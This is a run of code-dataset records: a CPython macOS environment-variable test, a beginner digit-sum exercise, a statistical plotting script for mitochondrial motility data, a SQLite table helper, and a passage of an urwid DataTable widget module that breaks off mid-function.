unittest\n\n\n@unittest.skipUnless(sys.platform == 'darwin' and sysconfig.get_config_var(\n 'WITH_NEXT_FRAMEWORK'), 'unnecessary on this platform')\nclass OSXEnvironmentVariableTestCase(unittest.TestCase):\n\n def _check_sys(self, ev, cond, sv, val=sys.executable + 'dummy'):\n with EnvironmentVarGuard() as evg:\n subpc = [str(sys.executable), '-c', \n 'import sys; sys.exit(2 if \"%s\" %s %s else 3)' % (val, cond,\n sv)]\n evg.unset(ev)\n rc = subprocess.call(subpc)\n self.assertEqual(rc, 3, 'expected %s not %s %s' % (ev, cond, sv))\n evg.set(ev, val)\n rc = subprocess.call(subpc)\n self.assertEqual(rc, 2, 'expected %s %s %s' % (ev, cond, sv))\n\n def test_pythonexecutable_sets_sys_executable(self):\n self._check_sys('PYTHONEXECUTABLE', '==', 'sys.executable')\n\n\nif __name__ == '__main__':\n 
unittest.main()\n","repo_name":"emilyemorehouse/ast-and-me","sub_path":"code/tmp_rtrip/test/test_osx_env.py","file_name":"test_osx_env.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"29"} +{"seq_id":"73064306959","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Jun 15 19:55:27 2019\r\n\r\n@author: Yudy Andrea Fierro\r\n\"\"\"\r\n# Exercise 4\r\n\r\nlist_b = []\r\n\r\nsum_pos = 0\r\n\r\nb = int(input('Enter a positive integer: '))\r\n\r\n'''Break the number down digit by digit and store the digits in a list''' \r\nwhile b > 0:\r\n    list_b.append(b%10)\r\n    b//=10\r\n\r\n'''Check whether each digit is even and add it to the running sum'''\r\nfor i in list_b :\r\n    if i%2 == 0:\r\n        sum_pos += i\r\n    \r\nif sum_pos == 0:\r\n    print('There are no even digits')\r\n    \r\nelse:\r\n    print('The sum of the even digits is: ',sum_pos)","repo_name":"yudyandrea/114562_FierroYudy","sub_path":"Ejercicio4.py","file_name":"Ejercicio4.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"10535923631","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul  1 08:51:02 2022\n\n@author: TimMonko\n\"\"\"\n\n#%% Import and Wrangle Data\nimport os\nimport pandas as pd\nimport glob\nimport numpy as np\n\nfile_directory = r\"C:\\\Users\\\TimMonko\\\Documents\\\GitHub\\\BastianLab\\\WorkingPython\\\AxonMitoMotility_TM 2\\\A\"\nos.chdir(file_directory)\n\nfile_type = \"*.csv\"\nfilenames = glob.glob(file_type)\n\ndata_list = []\nfor file in filenames:\n    val_name = file[:len(file) - 4]\n    raw_data = pd.read_csv(file)\n    melt_data = (raw_data\n                 .melt(value_name = val_name, var_name = 'Tx')\n                 .set_index('Tx'))\n    data_list.append(melt_data)\n\ndata = pd.concat(data_list, axis = 1, ignore_index = False).dropna(axis = 0).reset_index()\ndata = data.assign(Log = lambda data: np.log(data['Average Speed (per Mito)']))\ndata = data.assign(Log2 = lambda data: np.log(data['Percent Time Moving']))\n\ndata = data.assign(Per = lambda data: data['Percent Time Moving'] / 100)\ndata_describe = data.groupby(\"Tx\").describe()\n\n#%% Pingouin Stats\n# https://pingouin-stats.org/index.html\n# https://pingouin-stats.org/guidelines.html\nimport pingouin as pg\n\ndef dv_tests(df, dv, iv):\n    norm = pg.normality(data = df, dv = dv, group = iv) # Normal distribution of population assumed true in ANOVA/T\n    \n    hs = pg.homoscedasticity(data = df, dv = dv, group = iv) # Homogeneity of Variances (ANOVA/T assumption is true)\n\n    lr = pg.anova(data = df, dv = dv, between = iv)\n    print(dv + ' x ' + iv, norm, hs, lr, sep = '\\n')\n    \nfor dvs in data.columns[data.columns != 'Tx']:\n    dv_tests(data, dvs, 'Tx')\n\n# mitoc density, retro velocity, perc time retro motion, perc pausing, perc time moving, perc time anterograde motion \n\n#%% Seaborn Settings for Plotting\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom statannotations.Annotator import Annotator # https://github.com/trevismd/statannotations\n#statsannotations for the future https://levelup.gitconnected.com/statistics-on-seaborn-plots-with-statannotations-2bfce0394c00\n\n# must explicitly invoke set_theme else it uses matplotlib defaults. 
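# --- Editor's note (added): a short trace of the digit-extraction loop in Ejercicio4.py
# above (b % 10 peels off the last digit, b //= 10 drops it); the input 4726 is an
# invented example.
# b = 4726 -> list_b grows as [6], [6, 2], [6, 2, 7], [6, 2, 7, 4]
# even digits: 6 + 2 + 4 = 12, so the script prints that the sum of the even digits is 12
# --- end of editor's note ---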
Overrides all matplotlib based plots\nsns.set_theme(style = \"darkgrid\", context = \"notebook\", palette = \"colorblind\") \n\n#%% Discrete plotting\n\ndef box_swarm_plot(x, y, data, ylabel):\n ax = sns.boxplot(x = x, y = y, data = data,\n width = 0.6, palette = 'pastel')\n\n ax = sns.swarmplot(x = x , y = y, data = data,\n edgecolor = 'gray', linewidth = None)\n\n ax.set_xlabel(None)\n ax.set_ylabel(ylabel)\n annotator = Annotator(ax, pairs = [(\"IS\", \"ID\")], data = data, x = x, y = y)\n annotator.configure(test = 'Mann-Whitney', text_format = 'star', loc = 'inside')\n annotator.apply_and_annotate()\n return ax\n\nplots = []\n\nfor dvs in data.columns[data.columns != 'Tx']:\n plot = box_swarm_plot('Tx', dvs, data, dvs)\n plt.show()\n plots.append(plot)\n\n# plots[0].figure.savefig('box.svg') # to call from list\n\n#%% PairGrid relationship plot\n#quick and dirty, but caution on amount of variables\n\npp = sns.pairplot(data, hue = \"Tx\", kind = 'reg') # default is scatter\n\n#%% Residual plotting to test for linearity of data\na = sns.residplot(x = 'Log', y = 'Percent Time Moving', data = data)\n\n#%%\n\nr = sns.lmplot(\n x = 'Average Speed (per Mito)',\n y = 'Per',\n data = data,\n hue = 'Tx',\n logistic = True)\n#%% Seaborn Relational Plotting\n\n\nr = sns.lmplot(\n x = 'Pause Frequency (per Mito)', \n y = 'Log', \n hue = 'Tx', \n data = data)\n\nr = sns.lmplot(\n x = 'Average Speed (per Mito)', \n y = 'Percent Time Moving', \n hue = 'Tx', \n data = data,\n logx = True)\n\nr = sns.lmplot(\n x = 'Log', \n y = 'Percent Time Moving', \n hue = 'Tx', \n data = data)\n\nr = sns.lmplot(\n x = 'Log', \n y = 'Log2', \n hue = 'Tx', \n data = data,\n robust = True)\n\nr = sns.lmplot(\n x = 'Average_Branch_Length', \n y = 'Num_Branches', \n hue = 'Tx', \n data = data)\n\nr.legend.set_title(\"Treatment\")\n#r.set_xlabels(\"Avg. Branch Length\")\n#r.set_ylabels(\"Num. Branches\")\n\nplt.show()\nr.figure.savefig('LmPlot.svg')\n#%% Kde plot\n\nj = sns.jointplot(\n data = data,\n x = 'Average Speed (per Mito)',\n y = 'Percent Time Moving',\n hue = 'Tx')\n\nj = sns.jointplot(\n data = data,\n x = 'Average Speed (per Mito)',\n y = 'Percent Time Moving',\n hue = 'Tx',\n kind = \"kde\")\n\n#%% Tidy Data statsmodels stats \n# R like syntax, much more robust, but more complex \n# https://www.statsmodels.org/stable/gettingstarted.html\n# Consider the importance of bounded data (i.e. 
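The plotting section above pairs a boxplot with a swarmplot and annotates the IS/ID comparison through statannotations. A self-contained sketch of that pattern on synthetic data; the toy frame and effect sizes are assumptions, not the study's data:

```python
# Sketch (assumes seaborn and statannotations are installed): the same
# box + swarm + Mann-Whitney annotation pattern on a synthetic frame.
import numpy as np
import pandas as pd
import seaborn as sns
from statannotations.Annotator import Annotator

rng = np.random.default_rng(0)
toy = pd.DataFrame({
    "Tx": ["IS"] * 20 + ["ID"] * 20,
    "value": np.concatenate([rng.normal(1.0, 0.2, 20), rng.normal(1.4, 0.2, 20)]),
})

ax = sns.boxplot(x="Tx", y="value", data=toy, width=0.6)
ax = sns.swarmplot(x="Tx", y="value", data=toy, edgecolor="gray")
annotator = Annotator(ax, pairs=[("IS", "ID")], data=toy, x="Tx", y="value")
annotator.configure(test="Mann-Whitney", text_format="star", loc="inside")
annotator.apply_and_annotate()
```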
percents) when modeling https://stats.stackexchange.com/questions/103731/what-are-the-issues-with-using-percentage-outcome-in-linear-regression\n\n\n\nimport statsmodels.api as sm \nfrom statsmodels.formula.api import ols\n\n# OLS model -- a \"complicated\" look at ANOVA stats, C() forces categorical\nmodel = ols('Q(\"Average Speed (per Mito)\") ~ Q(\"Percent Time Moving\") * C(Tx)', data = data).fit()\nmodel = ols('Total_Branch_Length ~ Num_Branches * C(Tx)', data = data).fit()\nmodel = ols('Num_Branches ~ Average_Branch_Length * C(Tx)', data = data).fit()\n\n#print(model.summary()) # very overwhelming output\n# So, push the model through the ANOVA to simplify the output \nanova_table = sm.stats.anova_lm(model, typ = 2)\nanova_table\n\n# Outliers with statsmodels\n#test = model.outlier_test()\n#outliers_test = test[test['bonf(p)'] < 0.05]\n\n\n\n\n","repo_name":"TimMonko/BastianLab","sub_path":"PythonProjects/AxonMitoMotility_TM 2/A/Old_AxonMito_Data_from_TB.py","file_name":"Old_AxonMito_Data_from_TB.py","file_ext":"py","file_size_in_byte":5372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"18083270008","text":"from .Tables import Table\n\n\nclass Measure(Table):\n def __init__(self, table_name: str, db_name: str) -> None:\n super().__init__(table_name, db_name)\n\n def create_table(self) -> None:\n self.db.create_connection()\n query = (\n f\"CREATE TABLE IF NOT EXISTS {self.table_name}s (\"\n f\"{self.table_name}_id INTEGER PRIMARY KEY, {self.table_name}_name TEXT UNIQUE);\"\n )\n self.db.execute_query(query)\n self.db.connection.commit()\n","repo_name":"EliasCarvalho20/JBA-Python-Projects","sub_path":"Medium/Food Blog Backend/Food Blog Backend/task/tables/Measure.py","file_name":"Measure.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"22944608499","text":"\nimport logging\nlogger = logging.getLogger(\"urwid_datatable\")\nimport urwid\nfrom urwid_utils.palette import *\nfrom .listbox import ScrollingListBox\nfrom orderedattrdict import OrderedDict\nimport itertools\nimport traceback\nfrom datetime import datetime, date as datetype\nimport math\nfrom blist import blist\n\nfrom .dataframe import *\nfrom .rows import *\n\nclass NoSuchColumnException(Exception):\n pass\n\ndef make_value_function(template):\n\n def inner(table, row):\n return template.format(\n row=table.index_to_position(\n row.get(table.index)\n )+1,\n rows_loaded = len(table),\n rows_total = table.query_result_count()\n )\n\n return inner\n\n\nclass DataTableColumn(object):\n\n def __init__(self, name,\n label=None,\n value=None,\n width=('weight', 1),\n align=\"left\", wrap=\"space\",\n padding = DEFAULT_CELL_PADDING, #margin=1,\n hide=False,\n format_fn=None,\n format_record = None, # format_fn is passed full row data\n attr = None,\n sort_key = None, sort_reverse=False,\n sort_icon = None,\n footer_fn = None, footer_arg = \"values\"):\n\n self.name = name\n self.label = label if label is not None else name\n if value:\n if isinstance(value, str):\n self.value_fn = make_value_function(value)\n elif callable(value):\n self.value_fn = value\n else:\n self.value_fn = None\n self.width = width\n self.align = align\n self.wrap = wrap\n self.padding = padding\n self.hide = hide\n self.format_fn = format_fn\n self.format_record = format_record\n self.attr = attr\n self.sort_key = sort_key\n self.sort_reverse = sort_reverse\n self.sort_icon = sort_icon\n 
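The statsmodels block above fits an OLS formula with a categorical treatment term and summarizes it through a type-II ANOVA. A runnable sketch of the same ols()/anova_lm() pattern on synthetic data; the column names here are illustrative:

```python
# Sketch: formula-based OLS with C() marking the categorical term,
# then a compact type-II ANOVA table for the fit.
import numpy as np
import pandas as pd
import statsmodels.api as sm
from statsmodels.formula.api import ols

rng = np.random.default_rng(1)
toy = pd.DataFrame({
    "y": rng.normal(size=40),
    "x": rng.normal(size=40),
    "Tx": ["IS", "ID"] * 20,
})
model = ols("y ~ x * C(Tx)", data=toy).fit()
print(sm.stats.anova_lm(model, typ=2))
```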
self.footer_fn = footer_fn\n        self.footer_arg = footer_arg\n\n        if isinstance(self.width, tuple):\n            if self.width[0] != \"weight\":\n                raise Exception(\n                    \"Column width %s not supported\" %(self.width[0])\n                )\n            self.sizing, self.width = self.width\n        elif isinstance(width, int):\n            self.sizing = \"given\"\n        else:\n            self.sizing = width\n\n\n    def width_with_padding(self, table_padding=None):\n        padding = 0\n        if self.padding is None and table_padding is not None:\n            padding = table_padding\n        return self.width + 2*padding\n\n\n    def _format(self, v):\n\n        # First, call the format function for the column, if there is one\n        if self.format_fn:\n            try:\n                v = self.format_fn(v)\n            except Exception as e:\n                logger.error(\"%s format exception: %s\" %(self.name, v))\n                logger.exception(e)\n                raise e\n        return self.format(v)\n\n\n    def format(self, v):\n\n        # Do our best to make the value into something presentable\n        if v is None:\n            v = \"\"\n        elif isinstance(v, int):\n            v = \"%d\" %(v)\n        elif isinstance(v, float):\n            v = \"%.03f\" %(v)\n        elif isinstance(v, datetime):\n            v = v.strftime(\"%Y-%m-%d %H:%M:%S\")\n        elif isinstance(v, datetype):\n            v = v.strftime(\"%Y-%m-%d\")\n        if not isinstance(v, urwid.Widget):\n            v = urwid.Text(v, align=self.align, wrap=self.wrap)\n        return v\n\n\nclass DataTable(urwid.WidgetWrap, urwid.listbox.ListWalker):\n\n\n    signals = [\"select\", \"refresh\",\n               # \"focus\", \"unfocus\", \"row_focus\", \"row_unfocus\",\n               \"drag_start\", \"drag_continue\", \"drag_stop\"]\n\n    ATTR = \"table\"\n\n    columns = []\n\n    limit = None\n    index = \"index\"\n\n    with_header = True\n    with_footer = False\n    with_scrollbar = False\n\n    sort_by = (None, None)\n    query_sort = False\n    sort_icons = True\n    sort_refocus = False\n\n    border = DEFAULT_TABLE_BORDER\n    padding = DEFAULT_CELL_PADDING\n\n    ui_sort = True\n\n    attr_map = {}\n    focus_map = {}\n    highlight_map = {}\n    highlight_focus_map = {}\n\n    detail_fn = None\n    detail_column = None\n    auto_expand_details = False\n\n    def __init__(self,\n                 columns = None,\n                 limit=None,\n                 index=None,\n                 with_header=None, with_footer=None, with_scrollbar=None,\n                 sort_by=None, query_sort=None, sort_icons=None,\n                 sort_refocus=None,\n                 border=None, padding=None,\n                 detail_fn = None, detail_column = None,\n                 auto_expand_details = False,\n                 ui_sort=None):\n\n        self._focus = 0\n        if columns is not None: self.columns = columns\n        if index: self.index = index\n\n        if not self.index in self.column_names:\n            self.columns.insert(\n                0,\n                DataTableColumn(self.index, hide=True)\n            )\n\n        if query_sort: self.query_sort = query_sort\n\n        if sort_by:\n            if isinstance(sort_by, tuple):\n                column = sort_by[0]\n                reverse = sort_by[1]\n            else:\n                column = sort_by\n                reverse = None\n            self.sort_by = (column, reverse)\n\n        self.initial_sort = self.sort_by\n\n        if sort_icons is not None: self.sort_icons = sort_icons\n        if sort_refocus is not None: self.sort_refocus = sort_refocus\n\n        if with_header is not None: self.with_header = with_header\n        if with_footer is not None: self.with_footer = with_footer\n        if with_scrollbar is not None: self.with_scrollbar = with_scrollbar\n\n        if border is not None: self.border = border\n        if padding is not None: self.padding = padding\n\n        if ui_sort is not None: self.ui_sort = ui_sort\n\n        if detail_fn is not None: self.detail_fn = detail_fn\n        if detail_column is not None: self.detail_column = detail_column\n        if auto_expand_details: self.auto_expand_details = auto_expand_details\n\n        # self.offset = 0\n        if limit:\n            self.limit = limit\n\n        self.sort_column = None\n\n        self.filters = 
None\n self.filtered_rows = blist()\n\n logger.debug(\"columns: %s\" %(self.column_names))\n\n kwargs = dict(\n columns = self.column_names,\n use_blist=True,\n sort=False,\n # sorted=True,\n )\n if self.index:\n kwargs[\"index_name\"] = self.index\n\n self.df = DataTableDataFrame(**kwargs)\n\n\n self.pile = urwid.Pile([])\n self.listbox = ScrollingListBox(\n self, infinite=self.limit,\n with_scrollbar = self.with_scrollbar,\n row_count_fn = self.row_count\n )\n\n urwid.connect_signal(\n self.listbox, \"select\",\n lambda source, selection: urwid.signals.emit_signal(\n self, \"select\", self, self.get_dataframe_row(selection.index))\n )\n urwid.connect_signal(\n self.listbox, \"drag_start\",\n lambda source, drag_from: urwid.signals.emit_signal(\n self, \"drag_start\", self, drag_from)\n )\n urwid.connect_signal(\n self.listbox, \"drag_continue\",\n lambda source, drag_from, drag_to: urwid.signals.emit_signal(\n self, \"drag_continue\", self, drag_from, drag_to)\n )\n urwid.connect_signal(\n self.listbox, \"drag_stop\",\n lambda source, drag_from ,drag_to: urwid.signals.emit_signal(\n self, \"drag_stop\", self, drag_from, drag_to)\n )\n\n if self.limit:\n urwid.connect_signal(self.listbox, \"load_more\", self.load_more)\n # self.offset = 0\n\n if self.with_header:\n self.header = DataTableHeaderRow(\n self,\n border = self.border,\n padding = self.padding,\n )\n\n self.pile.contents.insert(0,\n (self.header, self.pile.options('pack'))\n )\n\n if self.ui_sort:\n urwid.connect_signal(\n self.header, \"column_click\",\n lambda index: self.sort_by_column(index, toggle=True)\n )\n\n self.pile.contents.append(\n (self.listbox, self.pile.options('weight', 1))\n )\n self.pile.focus_position = len(self.pile.contents)-1\n\n if self.with_footer:\n self.footer = DataTableFooterRow(\n self,\n border = self.border,\n padding = self.padding\n )\n self.pile.contents.append(\n (self.footer, self.pile.options('pack'))\n )\n\n\n self.reset()\n\n if self.sort_by:\n self.sort_by_column(self.sort_by)\n\n\n self.attr = urwid.AttrMap(\n self.pile,\n attr_map = self.attr_map,\n # focus_map = self.focus_map\n )\n super(DataTable, self).__init__(self.attr)\n\n\n def query(self, sort=None, offset=None):\n raise Exception(\"query method must be overriden\")\n\n def query_result_count(self):\n raise Exception(\"query_result_count method must be defined\")\n\n @classmethod\n def get_palette_entries(\n cls,\n user_entries={},\n min_contrast_entries = None,\n min_contrast = 2.0,\n default_background=\"black\"\n ):\n\n\n foreground_map = {\n \"table_row_body\": [ \"light gray\", \"light gray\" ],\n \"table_row_header\": [ \"light gray\", \"white\" ],\n \"table_row_footer\": [ \"light gray\", \"white\" ],\n }\n\n background_map = {\n None: [ \"black\", \"black\" ],\n \"focused\": [ \"dark gray\", \"g15\" ],\n \"highlight\": [\"light gray\", \"g15\"],\n \"highlight focused\": [\"light gray\", \"g23\"],#\"g23\"],\n }\n\n entries = dict()\n\n row_attr = \"table_row_body\"\n for suffix in [None, \"focused\",\n \"highlight\", \"highlight focused\"]:\n if suffix:\n attr = ' '.join([row_attr, suffix])\n else:\n attr = row_attr\n entries[attr] = PaletteEntry(\n mono = \"white\",\n foreground = foreground_map[row_attr][0],\n background = background_map[suffix][0],\n foreground_high = foreground_map[row_attr][1],\n background_high = background_map[suffix][1],\n )\n\n header_foreground_map = {\n None: [\"white,bold\", \"white,bold\"],\n \"focused\": [\"dark gray\", \"white,bold\"],\n \"column_focused\": [\"black\", \"black\"],\n 
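DataTable above leaves query() and query_result_count() as stubs for subclasses to override. A hypothetical minimal subclass sketch showing the expected contract (row dicts keyed by the table's columns, including the index column); the class name and data are invented for illustration:

```python
# Hypothetical subclass sketch: query() yields row dicts, and
# query_result_count() reports how many rows the backing store holds.
class StaticDataTable(DataTable):
    columns = [DataTableColumn("name"), DataTableColumn("age")]
    DATA = [
        dict(index=0, name="alice", age=30),
        dict(index=1, name="bob", age=25),
    ]

    def query(self, sort=(None, None), offset=None, limit=None, load_all=False):
        for row in self.DATA:
            yield row

    def query_result_count(self):
        return len(self.DATA)
```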
\"highlight\": [\"yellow,bold\", \"yellow,bold\"],\n \"highlight focused\": [\"yellow\", \"yellow\"],\n \"highlight column_focused\": [\"yellow\", \"yellow\"],\n }\n\n header_background_map = {\n None: [\"light gray\", \"g23\"],\n \"focused\": [\"light gray\", \"g50\"],\n \"column_focused\": [\"white\", \"g70\"],#\"g23\"],\n \"highlight\": [\"light gray\", \"g38\"],\n \"highlight focused\": [\"light gray\", \"g50\"],\n \"highlight column_focused\": [\"white\", \"g70\"],\n }\n\n for prefix in [\"table_row_header\", \"table_row_footer\"]:\n for suffix in [\n None, \"focused\", \"column_focused\",\n \"highlight\", \"highlight focused\",\n \"highlight column_focused\"\n ]:\n if suffix:\n attr = ' '.join([prefix, suffix])\n else:\n attr = prefix\n entries[attr] = PaletteEntry(\n mono = \"white\",\n foreground = header_foreground_map[suffix][0],\n background = header_background_map[suffix][0],\n foreground_high = header_foreground_map[suffix][1],\n background_high = header_background_map[suffix][1],\n )\n\n\n for name, entry in list(user_entries.items()):\n DataTable.focus_map[name] = \"%s focused\" %(name)\n DataTable.highlight_map[name] = \"%s highlight\" %(name)\n DataTable.highlight_focus_map[\"%s highlight\" %(name)] = \"%s highlight focused\" %(name)\n for suffix in [None, \"focused\",\n \"highlight\", \"highlight focused\"]:\n\n # Check entry backgroun colors against default bg. If they're\n # the same, replace the entry's background color with focus or\n # highglight color. If not, preserve the entry background.\n\n default_bg_rgb = urwid.AttrSpec(default_background, default_background, 16)\n bg_rgb = urwid.AttrSpec(entry.background, entry.background, 16)\n background = background_map[suffix][0]\n if default_bg_rgb.get_rgb_values() != bg_rgb.get_rgb_values():\n background = entry.background\n\n background_high = background_map[suffix][1]\n if entry.background_high:\n bg_high_rgb = urwid.AttrSpec(entry.background_high, entry.background_high, 1<<24)\n if default_bg_rgb.get_rgb_values() != bg_high_rgb.get_rgb_values():\n background_high = entry.background_high\n\n foreground = entry.foreground\n background = background\n foreground_high = entry.foreground_high if entry.foreground_high else entry.foreground\n if min_contrast_entries and name in min_contrast_entries:\n # All of this code is available in the colourettu package\n # (https://github.com/MinchinWeb/colourettu) but newer\n # versions don't run Python 3, and older versions don't work\n # right.\n def normalized_rgb(r, g, b):\n\n r1 = r / 255\n g1 = g / 255\n b1 = b / 255\n\n if r1 <= 0.03928:\n r2 = r1 / 12.92\n else:\n r2 = math.pow(((r1 + 0.055) / 1.055), 2.4)\n if g1 <= 0.03928:\n g2 = g1 / 12.92\n else:\n g2 = math.pow(((g1 + 0.055) / 1.055), 2.4)\n if b1 <= 0.03928:\n b2 = b1 / 12.92\n else:\n b2 = math.pow(((b1 + 0.055) / 1.055), 2.4)\n\n return (r2, g2, b2)\n\n def luminance(r, g, b):\n\n return math.sqrt(\n 0.299*math.pow(r, 2) +\n 0.587*math.pow(g, 2) +\n 0.114*math.pow(b, 2)\n )\n\n def contrast(c1, c2):\n\n n1 = normalized_rgb(*c1)\n n2 = normalized_rgb(*c2)\n lum1 = luminance(*n1)\n lum2 = luminance(*n2)\n minlum = min(lum1, lum2)\n maxlum = max(lum1, lum2)\n return (maxlum + 0.05) / (minlum + 0.05)\n\n table_bg = background_map[suffix][1]\n attrspec_bg = urwid.AttrSpec(table_bg, table_bg, 256)\n color_bg = attrspec_bg.get_rgb_values()[3:6]\n attrspec_fg = urwid.AttrSpec(\n foreground_high,\n foreground_high,\n 256\n )\n color_fg = attrspec_fg.get_rgb_values()[0:3]\n cfg = contrast(color_bg, color_fg)\n cblack = 
contrast((0,0,0), color_fg)\n # cwhite = contrast((255, 255, 255), color_fg)\n # logger.info(\"%s, %s, %s\" %(cfg, cblack, cwhite))\n # raise Exception(\"%s, %s, %s, %s, %s, %s\" %(table_bg, color_fg, color_bg, cfg, cblack, cwhite))\n if cfg < min_contrast and cfg < cblack:\n # logger.info(\"adjusting contrast of %s\" %(name))\n foreground_high = \"black\"\n # if cblack > cwhite:\n # else:\n # foreground_high = \"white\"\n\n if suffix:\n attr = ' '.join([name, suffix])\n else:\n attr = name\n\n # print foreground, foreground_high, background, background_high\n entries[attr] = PaletteEntry(\n mono = \"white\",\n foreground = foreground,\n background = background,\n foreground_high = foreground_high,\n background_high = background_high,\n )\n\n entries.update({\n\n \"scroll_pos\": PaletteEntry(\n mono = \"white\",\n foreground = \"black\",\n background = \"white\",\n foreground_high = \"black\",\n background_high = \"white\"\n ),\n \"scroll_marker\": PaletteEntry(\n mono = \"white,bold\",\n foreground = \"black,bold\",\n background = \"white\",\n foreground_high = \"black,bold\",\n background_high = \"white\"\n ),\n \"scroll_view\": PaletteEntry(\n mono = \"black\",\n foreground = \"black\",\n background = \"light gray\",\n foreground_high = \"black\",\n background_high = \"g50\"\n ),\n \"scroll_bg\": PaletteEntry(\n mono = \"black\",\n foreground = \"light gray\",\n background = \"dark gray\",\n foreground_high = \"light gray\",\n background_high = \"g23\"\n ),\n\n })\n # raise Exception(entries)\n return entries\n\n\n @property\n def focus(self): return self._focus\n\n def next_position(self, position):\n index = position + 1\n if index > len(self.filtered_rows): raise IndexError\n return index\n\n def prev_position(self, position):\n index = position-1\n if index < 0: raise IndexError\n return index\n\n def set_focus(self, position):\n # logger.debug(\"walker set_focus: %d\" %(position))\n self._focus = position\n self._modified()\n\n def _modified(self):\n # self.focus_position = 0\n urwid.listbox.ListWalker._modified(self)\n\n def __getitem__(self, position):\n # logger.debug(\"walker get: %d\" %(position))\n if position < 0 or position >= len(self.filtered_rows): raise IndexError\n try:\n r = self.get_row_by_position(position)\n return r\n except IndexError:\n logger.error(traceback.format_exc())\n raise\n # logger.debug(\"row: %s, position: %s, len: %d\" %(r, position, len(self)))\n\n def __len__(self):\n return len(self.filtered_rows)\n\n def __getattr__(self, attr):\n if attr in [\n \"head\",\n \"tail\",\n \"index_name\",\n \"log_dump\",\n ]:\n return getattr(self.df, attr)\n elif attr in [\"body\"]:\n return getattr(self.listbox, attr)\n # elif attr == \"body\":\n # return self.walker\n raise AttributeError(attr)\n\n @property\n def column_names(self):\n return [c.name for c in self.columns]\n\n @property\n def focus_position(self):\n return self._focus\n # return self.listbox.focus_position\n\n @focus_position.setter\n def focus_position(self, value):\n self._focus = value\n # self.listbox.focus_position = value\n self.listbox._invalidate()\n\n def position_to_index(self, position):\n # if not self.query_sort and self.sort_by[1]:\n # position = -(position + 1)\n return self.df.index[position]\n\n def index_to_position(self, index):\n # raise Exception(index, self.df.index)\n return self.df.index.index(index)\n\n def get_dataframe_row(self, index):\n logger.debug(\"__getitem__: %s\" %(index))\n try:\n v = self.df[index:index]\n except IndexError:\n 
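The palette code above linearizes sRGB channels, takes a weighted root-mean-square luminance, and compares two colors as a ratio offset by 0.05. The same math, pulled out as a standalone sketch:

```python
# Standalone sketch of the contrast math used above: sRGB linearization,
# weighted RMS luminance, then a ratio offset by 0.05 on both sides.
import math

def _linear(c):
    c /= 255
    return c / 12.92 if c <= 0.03928 else math.pow((c + 0.055) / 1.055, 2.4)

def contrast(rgb1, rgb2):
    lum = lambda rgb: math.sqrt(
        0.299 * math.pow(_linear(rgb[0]), 2)
        + 0.587 * math.pow(_linear(rgb[1]), 2)
        + 0.114 * math.pow(_linear(rgb[2]), 2)
    )
    l1, l2 = lum(rgb1), lum(rgb2)
    return (max(l1, l2) + 0.05) / (min(l1, l2) + 0.05)

print(contrast((0, 0, 0), (255, 255, 255)))  # black on white -> maximal ratio
```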
logger.debug(traceback.format_exc())\n\n return self.df.get_columns(index, as_dict=True)\n\n def get_row(self, index):\n try:\n row = self.df.get(index, \"_rendered_row\")\n except:\n raise\n\n if self.df.get(index, \"_dirty\") or not row:\n # logger.debug(\"render %d\" %(position))\n self.refresh_calculated_fields([index])\n # vals = self[index]\n vals = self.get_dataframe_row(index)\n row = self.render_item(vals)\n focus = self.df.get(index, \"_focus_position\")\n if focus is not None:\n row.set_focus_column(focus)\n # logger.debug(\"render: %d, %d, %s\" %(position, index, row))\n self.df.set(index, \"_rendered_row\", row)\n self.df.set(index, \"_dirty\", False)\n return row\n\n def get_row_by_position(self, position):\n index = self.position_to_index(self.filtered_rows[position])\n return self.get_row(index)\n\n @property\n def selection(self):\n if len(self.body) and self.focus_position is not None:\n # FIXME: make helpers to map positions to indexes\n return self[self.focus_position]\n\n\n def render_item(self, item):\n # raise Exception(item)\n row = DataTableBodyRow(self, item,\n border = self.border,\n padding = self.padding,\n index=item[self.index])\n return row\n\n def refresh_calculated_fields(self, indexes=None):\n if not indexes:\n indexes = self.df.index[:]\n if not hasattr(indexes, \"__len__\"):\n indexes = [indexes]\n for col in self.columns:\n if not col.value_fn: continue\n for index in indexes:\n if self.df[index, \"_dirty\"]:\n self.df.set(index, col.name, col.value_fn(self, self.get_dataframe_row(index)))\n\n def visible_column_index(self, column_name):\n try:\n return next(i for i, c in enumerate(self.visible_columns)\n if c.name == column_name)\n\n except StopIteration:\n raise IndexError\n\n def sort_by_column(self, col=None, reverse=None, toggle=False):\n\n column_name = None\n column_number = None\n\n if isinstance(col, tuple):\n col, reverse = col\n\n elif col is None:\n col = self.sort_column\n\n if isinstance(col, int):\n try:\n column_name = self.visible_columns[col].name\n except IndexError:\n raise Exception(\"bad column number: %d\" %(col))\n column_number = col\n elif isinstance(col, str):\n column_name = col\n try:\n column_number = self.visible_column_index(column_name)\n except:\n column_number = None\n\n self.sort_column = column_number\n\n if not column_name:\n return\n try:\n column = next((c for c in self.columns if c.name == column_name))\n except:\n return # FIXME\n # raise NoSuchColumnException(\"column %s not found (%s)\" %(column_name, [c.name for c in self.columns]))\n # reverse = column.sort_reverse\n\n if reverse is None and column.sort_reverse is not None:\n reverse = column.sort_reverse\n\n if toggle and column_name == self.sort_by[0]:\n reverse = not self.sort_by[1]\n sort_by = (column_name, reverse)\n # sort_by = (column_name, reverse)\n # self.log_dump()\n\n # if not self.query_sort:\n\n self.sort_by = sort_by\n logger.info(\"sort_by: %s (%s), %s\" %(column_name, self.sort_column, reverse))\n if self.query_sort:\n self.reset()\n # else:\n\n row_index = None\n if self.sort_refocus:\n row_index = self[self._focus].data.get(self.index, None)\n logger.info(\"row_index: %s\" %(row_index))\n self.sort(column_name, key=column.sort_key)\n\n if self.with_header:\n self.header.update_sort(self.sort_by)\n\n self.set_focus_column(self.sort_column)\n if row_index:\n self.focus_position = self.index_to_position(row_index)\n\n def sort(self, column, key=None):\n import functools\n logger.debug(column)\n if not key:\n key = lambda x: (x is None, x)\n 
